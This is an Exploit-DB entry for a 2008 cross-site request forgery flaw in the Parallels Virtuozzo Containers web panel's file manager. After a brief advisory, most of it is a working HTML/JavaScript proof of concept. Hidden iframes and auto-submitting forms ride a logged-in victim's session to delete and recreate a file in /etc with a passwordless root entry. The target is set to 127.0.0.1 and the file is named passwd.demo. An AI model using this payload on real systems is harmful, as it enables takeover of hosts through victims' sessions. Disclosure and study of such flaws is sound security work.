Parallels Virtuozzo Containers 3.0.0-25.4/4.0.0-365.6 VZPP Interface File Manger - Cross-Site Request Forgery

EDB-ID:

31603

CVE:

2008-6478

EDB Verified:

Author:

poplix

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2008-04-03

Vulnerable App: 
source: https://www.securityfocus.com/bid/28589/info

Parallels Virtuozzo Containers is prone to a cross-site request-forgery vulnerability.

Exploiting the issue will allow a remote attacker to use a victim's currently active session to perform certain file-management actions with the privileges of the user running the application. Successful exploits will compromise affected computers.

Virtuozzo Containers 3.0.0-25.4.swsoft and 4.0.0-365.6.swsoft are vulnerable; other versions are also affected.

<!-- poplix papuasia.org -- http://px.dynalias.org -- 04-02-2008 this file exploits a vulnerable installation of virtuozzo web panel by overwriting /etc/passwd.demo tested against Version 365.6.swsoft (build: 4.0.0-365.6.swsoft). It doesn't work with older version due to paths changes. perform the following steps to test it: 1. create a blank /etc/passwd.demo on target machine 2. in this file replace 127.0.0.1 with target vps address 3. open a web browser and log into virtuozzo web interface 4. open this file in a new browser window and click the "lets rock" button when the page is fully loaded 5. check /etc/passwd.demo in the target vps filesystemm --> <script language="JavaScript"> var ok=false; function letsgo(){ ok=true; document.getElementById('form0').submit(); } </script> <!-- this sets /etc as the current path--> <iframe style="width:1px;height:1px;visibility:hidden" name=ifr src="https://127.0.0.1:4643/vz/cp/vzdir/infrman/envs/files/index?path=L2V0Yw==" ></iframe> <iframe id=ifr1 style="width:1px;height:1px;visibility:hidden" name=ifr1 onload="if(ok)document.getElementById('form1').submit();" ></iframe> <iframe id=ifr2 style="width:1px;height:1px;visibility:hidden" name=ifr2 > </iframe> <!-- delete /etc/passwd.demo --> <form id=form0 target=ifr1 method=post action="https://127.0.0.1:4643/vz/cp/vzdir/infrman/envs/files/list-control" > <input type=hidden name="file-name" value="passwd.demo"> <input type=hidden name=delete value=1> </form> <!-- create /etc/passwd.demo --> <form id=form1 target=ifr2 enctype="multipart/form-data" name="defaultForm" method="POST" action="https://127.0.0.1:4643/vz/cp/vzdir/infrman/envs/files/create-file"> <input xmlns:http="http://www.swsoft.com/xsl/cp/http" type="hidden" name="step" value="gen"> <input type=hidden name="file_name" value="passwd.demo"> <input type=hidden name="file_body" value="root::0:0::/root:/bin/bash"> <input type=hidden name="next" value="Create"> </form> <input type=button value="lets rock" onclick="letsgo()">
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services